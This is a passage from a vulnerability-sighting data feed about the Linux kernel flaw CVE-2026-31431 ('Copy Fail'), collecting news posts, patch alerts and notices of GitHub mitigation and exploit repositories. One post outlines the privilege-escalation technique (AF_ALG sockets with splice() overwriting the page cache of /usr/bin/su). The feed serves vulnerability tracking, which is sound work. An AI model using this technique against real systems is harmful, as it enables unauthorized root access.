Brown\n                      Mar 13, '26\n                      Mar 27, '26 (27d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1761\n                       is displayed against a checkbox on Custom transportation Needs \n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1760\n                      Pick A Location - External address return as the SA\" is failing because the \"Pick A Location\" button cannot be located on the page, preventing test execution.\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1759\n                      [Chief Leschi-1.78][Reports] [User defined Reports] Unable to create a new report template\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 31, '26 (25d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1758\n                      API returns 500 error when sending IN filter with empty values array in search request\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1757\n                      Stops/Checkpoints \u2013 Map not displayed in \u201cPick A Location\u201d popup when using Relocate\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1756\n                      [Chief Leschi-1.78] Created date is not same when downloaded a report\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (30d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1755\n                      Data Management \u2013 Map fails to load across multiple modules\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1754\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with CA Reports\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (30d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1753\n                      Students \u2013 Student picture API returning 404 Not Found when opening student record\n                      Josiah Brown\n                      Mar 12, '26\n                      Apr 6, '26 (21d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1752\n                      Students \u2013 Address parsing APIs (type, prefix, suffix) returning 500 Internal Server Error in background requests\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1751\n                      Students \u2013 Opening student record triggers \"Error parsing address\" popup and address standardization API returns 500\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1749\n                      Historical changes API is returning 500 Internal server error on Vehicle on routes in Telamatics\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1615\n                      Payroll Data is not available/displaying\n                      \u2014\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1614\n                      Data is not Visible for Default Working Hours in Employees under Data Management\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1613\n                      UDF Tab is not Displayed in Employee Information Page\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1611\n                      RPO \u2013 OPT actions failure\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1610\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with Stops details\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1608\n                      Location search fails with 504 Gateway Timeout when adding a new Stop\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1606\n                      Student Needs dialogs shows formatting issues and invalid \u201c504\u201d need option\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1594\n                      [Foundations] 404 error on Students detail page\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1591\n                      Web Query not configured for aldine-tx\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1579\n                      [Support][1.78] [Telematics] -- Error on FE Live Subs\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 9, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1578\n                      [Support-Site-1.78] 500 internal server error for \"eligibilities\"call\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 10, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1577\n                      [Training][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 30, '26 (26d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1575\n                      [Manitouspring][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 9, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1572\n                      [Manitouspring][1.78] Audit Logs: Unknown has been shown for many logs in users column\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1570\n                      500 err on cancel report API\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1569\n                      API Timesout - Endless Spinning Wheel Issue\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1562\n                      API times out/ when searching with keywords for location in Pick a Location Popup [smoke/hemet]\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1558\n                      [Houston-1.780] [Mapping] Console Error\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1556\n                      Home Page - Telematics module not displayed on Home Page\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (43d)\n                      \u2014\n                      To Do\n                    \n\nData sourced live from Jira on May 05, 2026 at 06:32 PM.\n\nfunction showTab(key,el){\n  document.querySelectorAll('.tab').forEach(t=>t.classList.remove('active'));\n  el.classList.add('active');\n  document.querySelectorAll('.pane').forEach(p=>p.style.display='none');\n  document.getElementById('pane-'+key).style.display='block';\n}\n\n\n", "creation_timestamp": "2026-05-05T18:32:55.000000Z"}, {"uuid": "85d60892-6c2c-4af0-95cc-0b9ff0c067d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosecbriefly.bsky.social/post/3ml4hyynggu26", "content": "A critical Linux kernel bug, CVE-2026-31431, allows low-level users to gain full control of systems, prompting urgent patching efforts.\n", "creation_timestamp": "2026-05-05T15:13:42.149946Z"}, {"uuid": "6ad8d71a-57e6-48cd-bb2e-3636bc6e3ed7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newstecnicas.info.ve/post/3ml4i2aa4ts2b", "content": "\ud83d\udc27 \u00bfC\u00f3mo funciona ' #CopyFail'? El #exploit de 732 bytes que otorga acceso #Root en #Linux (CVE-2026-31431) (+MITIGACI\u00d3N) www.newstecnicas.info.ve/2026/04/copy...", "creation_timestamp": "2026-05-05T15:14:25.351311Z"}, {"uuid": "46a368ea-3d0b-4a92-a859-9237d6410c0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/webradiomexfm.bsky.social/post/3ml4k475i772v", "content": "Vulnerabilidade CopyFail no Linux amea\u00e7a servidores em todo o mundo\n\nExplora\u00e7\u00e3o ativa da falha CVE-2026-31431 coloca em risco distribui\u00e7\u00f5es Linux desde 2017.\n\nhttps://mexnews.online/l/MGv6SH\n\n#mexfm #mexnews #webradiomexfm #brasil #noticias #musica", "creation_timestamp": "2026-05-05T15:51:15.792139Z"}, {"uuid": "81162c86-5101-40d9-a557-5ee8e8d966e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/thedailytechfeed.com/post/3ml4ig7eeow24", "content": "Urgent: 'Copy Fail' vulnerability (CVE-2026-31431) affects Linux kernels since 2017, granting root access to unprivileged users. Patch immediately to secure your systems. #Linux #CyberSecurity #CVE202631431 Link: thedailytechfeed.com/copy-fail-fl...", "creation_timestamp": "2026-05-05T15:21:03.807741Z"}, {"uuid": "696aa910-ef4e-4178-be91-11401391d4cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82925", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a afalg-check\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a itsystem\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 14:32:55\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u0423\u0442\u0438\u043b\u0438\u0442\u0430 \u0434\u043b\u044f Linux, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c `AF_ALG`/`algif_aead` \u0438 \u043f\u043e\u043c\u043e\u0433\u0430\u0435\u0442 \u043e\u0446\u0435\u043d\u0438\u0442\u044c \u0440\u0438\u0441\u043a \u043f\u043e `CVE-2026-31431`.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T15:00:05.000000Z"}, {"uuid": "2193dea0-d8ea-462e-a82d-1a1d0710074f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/geeknewsbot.bsky.social/post/3ml4unv2rn62n", "content": "Podman \ub8e8\ud2b8\ub9ac\uc2a4 \ucee8\ud14c\uc774\ub108\uc640 Copy Fail \uc775\uc2a4\ud50c\ub85c\uc787\n\nCVE-2026-31431 Copy Fail\uc740 \ub85c\uceec \ube44\uad8c\ud55c \uc0ac\uc6a9\uc790\uac00 root \uc178\uc744 \uc5bb\uc744 \uc218 \uc788\uac8c \ud558\uba70, Podman \ub8e8\ud2b8\ub9ac\uc2a4 \ucee8\ud14c\uc774\ub108 \uc548\uc5d0\uc11c\ub3c4 \ucee8\ud14c\uc774\ub108 \ub0b4\ubd80 root \uad8c\ud55c \uc0c1\uc2b9\uc774 \uac00\ub2a5\ud568 Podman \ub8e8\ud2b8\ub9ac\uc2a4 \ucee8\ud14c\uc774\ub108\ub294...", "creation_timestamp": "2026-05-05T19:00:06.233636Z"}, {"uuid": "d4936136-edcb-4e48-bab9-251ce169bc1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82955", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a ubuntu-cve-2026-31431-mitigation\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a mrmtwoj\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 18:50:49\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u062f\u0633\u062a\u0648\u0631\u0627\u0644\u0639\u0645\u0644\u200c\u0647\u0627\u06cc \u06a9\u0627\u0647\u0634 \u0631\u06cc\u0633\u06a9 \u0648 \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0628\u0631\u0627\u06cc CVE-2026-31431 \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0627\u0648\u0628\u0648\u0646\u062a\u0648\u060c \u0634\u0627\u0645\u0644 \u0645\u0631\u0627\u062d\u0644 \u0627\u0631\u062a\u0642\u0627\u0621 \u06a9\u0631\u0646\u0644 \u0648 kmod.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T19:00:05.000000Z"}, {"uuid": "a2fb28a9-d49c-451c-b502-e702f45e0b38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tatzelwurm.eurosky.social/post/3ml4y4tbyg62s", "content": "Den neuen Linux Kernel nicht eingespielt und SSH Zugang geknackt??\n\nCVE-2026-31431, CVSS 7.8", "creation_timestamp": "2026-05-05T20:02:08.214339Z"}, {"uuid": "0002eaf3-220f-4f79-99c0-ae3471a68d2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3ml4zeylbdib2", "content": "CISA warns Linux Copy Fail flaw is being exploited to gain root access CISA has added the Linux kernel vulnerability CVE-2026-31431, known as Copy Fail, to its Known Exploited Vulnerabilities catal...\n\n#News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-05T20:24:38.878444Z"}, {"uuid": "d93e97ee-07f4-491e-9352-31e24efb70eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kompetenztraining.bsky.social/post/3ml3n2bv73e27", "content": "Wir hatten lange kein sch\u00f6nes Linux Local Privilege Escalation mehr, oder? CVE-2026-31431 kombiniert AF_ALG-Sockets mit splice(), um beliebige Daten in den Page Cache von Systembinaries zu schreiben \u2014 konkret /usr/bin/su. Kernel < 6.19.12 betroffen, gesamte 6.17.x-Linie ungepatcht.", "creation_timestamp": "2026-05-05T07:11:11.914328Z"}, {"uuid": "b98fd415-329e-42b1-9800-e2d2707051fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/SagaieNet/68a2d3a5ef28966ab7f6dbe83a6a0dd0", "content": "", "creation_timestamp": "2026-05-05T07:16:48.000000Z"}, {"uuid": "aba2168d-5538-45e0-b291-8ed30cb50c7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/SagaieNet/a7ac63874bd4ab1636c8ff56d9ebfde4", "content": "", "creation_timestamp": "2026-05-05T07:21:20.000000Z"}, {"uuid": "6fbb47a4-43a7-4dba-94d8-01bb1b603d86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newsycombinatorbot.bsky.social/post/3ml3owv3i6f27", "content": "CVE-2026-31431: Copy Fail vs. rootless containers (www.dragonsreach.it)\n\nDiscussion | Main Link", "creation_timestamp": "2026-05-05T07:45:05.207560Z"}, {"uuid": "f1cea772-db3a-441d-89aa-36ec1cdd8401", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/basefortify.bsky.social/post/3ml3qmxu3bk2t", "content": "\ud83d\udea8 What if a Linux exploit never touched disk?\n\nCopy Fail (CVE-2026-31431) lets attackers become root by corrupting the page cache in memory.\n\nNo file changes  \nNo integrity alerts  \nHarder to detect\n\nCVSS 7.8 (High)\n\n\ud83d\udc49 basefortify.eu/posts/2026/0... \n\n#Linux #CyberSecurity #CopyFail", "creation_timestamp": "2026-05-05T08:15:28.544366Z"}, {"uuid": "4411e3e7-5f2d-4894-a1a4-faceab439d74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/basefortify.bsky.social/post/3ml3qmzggm22t", "content": "\ud83d\udea8 What if a Linux exploit never touched disk?\n\nCopy Fail (CVE-2026-31431) lets attackers become root by corrupting the page cache in memory.\n\nNo file changes  \nNo integrity alerts  \nHarder to detect\n\nCVSS 7.8 (High)\n\n\ud83d\udc49 basefortify.eu/posts/2026/0... \n\n#Linux #CyberSecurity #CopyFail", "creation_timestamp": "2026-05-05T08:15:29.187832Z"}, {"uuid": "13135932-442e-4f54-905d-21fbd8d94ef5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/basefortify.bsky.social/post/3ml3qn4uwqc2t", "content": "\ud83d\udea8 What if a Linux exploit never touched disk?\n\nCopy Fail (CVE-2026-31431) lets attackers become root by corrupting the page cache in memory.\n\nNo file changes  \nNo integrity alerts  \nHarder to detect\n\nCVSS 7.8 (High)\n\n\ud83d\udc49 basefortify.eu/posts/2026/0... \n\n#Linux #CyberSecurity #CopyFail", "creation_timestamp": "2026-05-05T08:15:29.697939Z"}, {"uuid": "86eb20f6-3f3c-4c1e-ba63-e67aea1d5ea1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pixelsandpulse.bsky.social/post/3ml3qz3qfqc2h", "content": "A severe Linux kernel vulnerability, CVE-2026-31431 \"Copy Fail,\" lets attackers corrupt in-memory binaries for privilege escalation. We break down how it works and why rootless containers like Podman offer a vital layer of\u2026\n\nhttps://www.tpp.blog/1ip7iqt\n\n#cybersecurity #cve202631431 #copyfail", "creation_timestamp": "2026-05-05T08:22:07.197164Z"}, {"uuid": "38785b4f-0ce4-4901-9ba9-bad0b984b139", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/jfstenuit/7a90b1d6d1116863693907e6e1cd3de4", "content": "", "creation_timestamp": "2026-05-05T08:20:03.000000Z"}, {"uuid": "3be76bd2-0792-40bd-883d-1bf01da2ab83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3ml3rcn3kbgy2", "content": "CopyFail sur Linux : les patchs de s\u00e9curit\u00e9 sont-ils disponibles ? Les patchs pour la CVE-2026-31431, alias CopyFail, sont-ils disponibles pour les distributions Linux : Debian, Ubuntu, RHEL, etc...\n\n#Actu #Cybers\u00e9curit\u00e9 #Cybers\u00e9curit\u00e9 #Linux\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-05T08:27:30.777934Z"}, {"uuid": "6b269345-28a0-43f6-83ee-c84af4795290", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/annabzz.bsky.social/post/3ml3rlii7n22z", "content": "CVE-2026-31431?", "creation_timestamp": "2026-05-05T08:32:24.775674Z"}, {"uuid": "3896911e-2c50-480b-9d68-670b3acf3191", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/acalatrava/a632d8e224ce05db8a30be1d4e2dd69a", "content": "", "creation_timestamp": "2026-05-05T08:38:55.000000Z"}, {"uuid": "bd979fc0-a3f7-4a85-94cb-37332f426a90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82871", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail-exploit\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a xeloxa\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 06:58:46\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopy Fail (CVE-2026-31431) LPE exploit. A clean, multi-arch Python reimplementation targeting the Linux kernel AF_ALG page cache vulnerability.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T07:00:05.000000Z"}, {"uuid": "0c1c3d0e-c63a-4a08-ad90-bbdb546f61b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82877", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a mitigate-copy-fail.yml\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a deadRabbit92\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 07:57:21\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nMitigates CVE-2026-31431 (Copy Fail) by unloading and blacklisting algif_aead kernel module if it is loadable and has no active references.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T08:00:05.000000Z"}, {"uuid": "203376a8-750c-43b0-af70-900e2597cadc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/probbrain.bsky.social/post/3ml3uyvu37222", "content": "CVE-2026-31431: Copy Fail vs. rootless containers", "creation_timestamp": "2026-05-05T09:33:35.545167Z"}, {"uuid": "f842134f-c2c0-4e98-89d0-d69836e6eb7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/camorabug.com/post/3ml3vhxu7eb2v", "content": "Microsoft warns of high-severity Linux privilege escalation\u00a0flaw\n\nA new Microsoft warning says Copy Fail could increase risks for Kubernetes, CI/CD, and shared Linux workloads. Microsoft Defender has warned that CVE-2026-31431, also known as \u2018Copy Fail\u2018, is a high-severity local privilege\u2026", "creation_timestamp": "2026-05-05T09:42:01.425566Z"}, {"uuid": "cf9ac821-c976-4e5f-85e7-1f2c034cd574", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn100.atproto.rocks/post/3ml3vnz7zbm2n", "content": "CVE-2026-31431: Copy Fail vs. rootless containers\nhttps://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/\n\nhttps://news.ycombinator.com/item?id=48017813", "creation_timestamp": "2026-05-05T09:45:23.814588Z"}, {"uuid": "a8329cb5-9d60-4f91-8650-035f064ca820", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ml54nyutz6v2", "content": "Navigating the \u201cCopy Fail\u201d: Understanding and Mitigating CVE-2026-31431 in Linux A significant vulnerability dubbed \u201cCopy Fail,\u201d recorded as CVE-2026-31431, has emerged as a substantial con...\n\n#Current #Events #Linux #Security #AF_ALG #Copy #Fail #copy #fail #exploit #copy\n\nOrigin | Interest | [\u2026]", "creation_timestamp": "2026-05-05T21:23:22.426944Z"}, {"uuid": "40c76ecd-e292-4d6b-8b7b-a67855f606f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/npub1lllllll9xdgqvp5l3drml7kwrre9u5ma6je7ey8r0578dfqq8l8qrjujua.momostr.pink.ap.brid.gy/post/3ml54yysgkmv2", "content": "CVE-2026-31431 has been fun", "creation_timestamp": "2026-05-05T21:29:31.338369Z"}, {"uuid": "849a73c4-c164-4eda-823f-3325b45fc74a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/thehackernews/8920", "content": "\u26a0\ufe0f A new #Linux flaw is now under active exploitation.\n\nCISA added CVE-2026-31431 to its KEV list. The bug lets low-privilege users gain full root access. Patches released.\n\nFix deadline: May 15, 2026.\n\nRead: https://thehackernews.com/2026/05/cisa-adds-actively-exploited-linux-root.html", "creation_timestamp": "2026-05-03T06:48:23.000000Z"}, {"uuid": "8732cace-e770-4ffe-baf7-50d08a487b7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ef-edulog/9a60a90f5fec78acbb843852423e6888", "content": "\n\n\n\n\nJira Report \u2014 DO / IM / S2\n\n  :root {\n    --bg: #fff; --bg2: #f5f4ef; --bg3: #ebebeb;\n    --tx: #1a1a1a; --tx2: #666660; --tx3: #999994;\n    --info: #185FA5; --bdr: rgba(0,0,0,0.12); --bdr2: rgba(0,0,0,0.22);\n    --r: 8px; --rl: 12px;\n    --font: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;\n    --mono: 'SF Mono','Fira Code',monospace;\n  }\n  @media(prefers-color-scheme:dark){\n    :root{--bg:#1e1e1c;--bg2:#2a2a28;--bg3:#333330;--tx:#f0efe8;--tx2:#a8a79f;--tx3:#6e6e68;--info:#85B7EB;--bdr:rgba(255,255,255,0.1);--bdr2:rgba(255,255,255,0.18)}\n  